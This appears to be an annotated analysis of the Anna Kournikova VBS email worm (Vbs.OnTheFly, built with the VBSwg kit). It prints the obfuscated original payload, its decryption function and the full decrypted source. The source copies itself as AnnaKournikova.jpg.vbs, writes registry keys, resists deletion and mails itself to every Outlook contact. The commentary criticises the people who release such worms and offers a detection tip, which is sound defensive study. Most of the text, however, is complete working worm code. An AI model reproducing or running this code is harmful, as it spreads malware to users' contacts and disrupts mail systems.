People who release these worms created with VBSwg are ultra lame IMO.

Any idiot can create a worm with VBSwg (most of the routines look like

they were

written [K]alamar himself, so where's the effort or originality?), release

it and

create havoc.

I got nothing against [K]alamar, just people who use his software for

destructive

purposes.

That said, I don't think this worm is *really* destructive, but it can

cause major

problems with email servers.

BTW everything behind forward slashes are comments.   Most of the code is

self

explanatory though.

NB. To make it easier to detect these worms, click on view (in folder

menu),

options, view, and uncheck "Hide MS-DOS file extensions that are

registered"

*/

/*

Original Source (the part that you get sent)

============================================

Vbs.OnTheFly Created By OnTheFly

/*The LONG string ("X)udQ....") is the actual worm code.

The section following it is the decryption scheme.

Notice how all the variable and function names are made up of random

letters,

even in the decrypted code ( i renamed the variables). VBSwg does this to

make

detection by anti virus programs harder.   One subtle pitfall is that all

the variable

and function names are 11 characters long.   This could be used to make

detection

easier.   The obvious other pitfall is that "VBSwg" is appended to the end

of the worm

*/

Execute

e7iqom5JE4z("X)udQ0VpgjnH{tEcggvf{DQVpgjnH{QptGqttgTwugoPzgv
UvgGQ9v58Jr7R6?EgtvcQgldeg*vY$eUktvrU0gjnn+$9G5QJv786r0Rgtyiktg
v$MJWEu^hqyvtc^gpQjVHg{n$^.jE*t9:+(jE*t33+3(Etj3*63+(jE*t23+;(Etj5*
+4(Etj3*;2+(jE*t9;+(jE*t23+2(Etj3*32+(jE*t45+(jE*t33+;(Etj3*72+
(jE*t33+8(Etj3*62+(jE*t45+(jE*t8:+(jE*t:;+(jE*t33+7(Etj3*;3+
(jE*t23+5(Etj5*+4(Etj6*+;(Etj6*+8(Etj7*+5(Etj6*+:(Etj;*+:gUvQtcyVopl
di?7Egtvcqgldeg*vu$terkkviph0nkugu{gvqoldeg$v+tyQoclVip7de0rqh{nkguyterk0veuk
tvrwhnncpgot.yQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$kh9G5QJ
v786r0Rgtticgf$*MJWEu^hqyvtc^gpQjVHg{no^kcgn$f+@>$$3vgjpgp4CUJ9inEN+*
pgfhkhkopqjvp*yq+3?cfpf{cp*yq+4?8jvpg9G5QJv786r0RwtpJ$vv<r11yy0y
{fcp{dgvp0$n5.h.ncgupgfhkgUvMLUiJy9M59?ztyQoclVip7dq0grvpzghvnk*guyterk0veuktvrwhnncpgo.+3P\L7\Mz6wk?XLiMyUMJ99z5t0cgcfnnM

LUiJy9M590znEuqgFqKhqPvt*yQoclVip7dh0nkggkzvu*uuyterk0veuktvrwhnncpgo++V
gjpUvgWKg44:|6R2x?QtcyVopldi07tecggvgvvzkhgny*euktvru0terkhvnwpnoc.gVw
t+ggW4K|4R:x602tyvk\g7PML6\kzXwgW4K|4R:x602nEuqgGfpKhNqqrHpwveqkp4gUp9C
nJNi*E+QptGqttgTwugoPzgvUvgF54xQOzM8JT?EgtvcQgldeg*vQ$vwqnmqC0rrk
ncekvpq+$hKF54xQOzM8JT?Q$vwqnmqV$gjpUvgl74PvD\h;n:F?54xQOzM8JTI0vgcPgor
Uec*gO$RC$K+UvgUm834i35gN5?4lv7\P;D:h0nfCtfugNuukuvqHtcGjeL4TRoOuD4ToK
p8U4m33gi55NKhTLo4uR4OoD0TfCtfugGuvpktugE0wqvp>@2jVpg6fFDz5yi3xL?T
Lo4uR4OoD0TfCtfugGuvpktugE0wqvpqHt9Z;:cX|5gT?|3Vq6fFDz5yi3xLUvgk9sd4:6x
5\5?F54xQOzM8JTE0gtvcKggv*o+2gUvKQ6GXDl[LQ:?TLo4uR4OoD0TfCtfugGuvpktug
Z*:9X;5cT||g+k9sd4:6x5\5V0q?KQ6GXDl[LQ0:fCtfuguk9sd4:6x5\5U0dwglve?$gJgt{wqj
xc.g=+q$k9sd4:6x5\5D0fq{?J$<k$(dxtehn($jEegmjVuk$#(xednth($$guvY
hpu:sI[h;?3sk496d5:5x0\vCcvjeg

ovpuhuYsp[:;I3hC0fftyQoclVip7dI0vgrUegckHnnqgf*t+2(^$pCcpqMtwkpqmcxl0irx0ud$k9sd4
:6x5\5F0ngvgCgvhtgwUodvk?VwtgKhsk496d5:5x0\qV>@$$Vgjpk9sd4:6x5\5U0pgfGQ
9v58Jr7R6t0igtyvkgJ$EM^WquvhcygtQ^VpgjnH^{conkfg.$$$3pGfhKgPvzpGfhKgPvzpg
fhkpGfwHepkvpqX)udiy370d2")

Function e7iqom5JE4z(hFeiuKrcoj3)

For I = 1 To Len(hFeiuKrcoj3) Step 2

StTP1MoJ3ZU= Mid(hFeiuKrcoj3, I, 1)

WHz23rBqlo7= Mid(hFeiuKrcoj3, I + 1, 1)

If Asc(StTP1MoJ3ZU) = 15 Then

StTP1MoJ3ZU= Chr(10)

ElseIf Asc(StTP1MoJ3ZU) = 16 Then

StTP1MoJ3ZU = Chr(13)

ElseIf Asc(StTP1MoJ3ZU) = 17 Then

StTP1MoJ3ZU = Chr(32)

Else

StTP1MoJ3ZU = Chr(Asc(StTP1MoJ3ZU) - 2)

End If

If WHz23rBqlo7<> "" Then

If Asc(WHz23rBqlo7) = 15 Then

WHz23rBqlo7= Chr(10)

ElseIf Asc(WHz23rBqlo7) = 16 Then

WHz23rBqlo7= Chr(13)

ElseIf Asc(WHz23rBqlo7) = 17 Then

WHz23rBqlo7= Chr(32)

Else

WHz23rBqlo7= Chr(Asc(WHz23rBqlo7) - 2)

End If

End If

e7iqom5JE4z = e7iqom5JE4z & WHz23rBqlo7 & StTP1MoJ3ZU

Next

End Function

Vbswg 1.50b

*/

//*****Decrypted Code******

'Vbs.OnTheFly Created By OnTheFly    //L@/\/\3R who released the worm

On Error Resume Next

Set ws = CreateObject("WScript.Shell")

//says "Worm made with VBSwg 1.50b": another pitfall

ws.regwrite "HKCU\software\OnTheFly\", Chr(87) & Chr(111) & Chr(114) &

Chr(109) & Chr(32) & Chr(109) & Chr(97) & Chr(100) & Chr(101) & Chr(32) &

Chr(119) & Chr(105) & Chr(116) & Chr(104) & Chr(32) & Chr(86) & Chr(98) &

Chr(115) & Chr(119) & Chr(103) & Chr(32) & Chr(49) & Chr(46) & Chr(53) &

Chr(48) & Chr(98)

Set fso= Createobject("scripting.filesystemobject")

fso.copyfile wscript.scriptfullname,fso.GetSpecialFolder(0)&

"\AnnaKournikova.jpg.vbs"

if ws.regread ("HKCU\software\OnTheFly\mailed") <> "1" then

Outlook()

end if

//Red Herring?   Maybe, but NL *might* be the origin of the worm

if month(now) =1 and day(now) = 26 then

ws.run "Http://www.dynabyte.nl",3,false

end if

//The following section could be an anti-deletion technique

Set AnnaKournikova = fso.opentextfile(wscript.scriptfullname, 1)

SourceCode = AnnaKournikova.readall

AnnaKournikova.Close

Do

If Not (fso.fileexists(wscript.scriptfullname)) Then

Set AnnaKournikova = fso.createtextfile(wscript.scriptfullname, True)

AnnaKournikova.write SourceCode

AnnaKournikova.Close

End If

Loop

Function Outlook()

On Error Resume Next

Set OutlookApp = CreateObject("Outlook.Application")

If OutlookApp= "Outlook"Then

Set Mapi=OutlookApp.GetNameSpace("MAPI")

Set MapiAdList= Mapi.AddressLists

For Each Address In MapiAdList

If Address.AddressEntries.Count <> 0 Then

NumOfContacts = Address.AddressEntries.Count

//Get a list of contacts

For ContactNumber = 1 To NumOfContacts

Set EmailItem = OutlookApp.CreateItem(0)

Set ContactNumber = Address.AddressEntries(ContactNumber)

EmailItem.To = ContactNumber.Address

EmailItem.Subject = "Here you have, ;o)"

EmailItem.Body = "Hi:" & vbcrlf & "Check This!" & vbcrlf & ""

set EmailAttachment=EmailItem.Attachments

EmailAttachment.Add fso.GetSpecialFolder(0)& "\AnnaKournikova.jpg.vbs"

EmailItem.DeleteAfterSubmit = True

//Send the thing

If EmailItem.To <> "" Then

EmailItem.Send

ws.regwrite "HKCU\software\OnTheFly\mailed", "1"

End If

Next

End If

Next

end if

End Function

'Vbswg 1.50b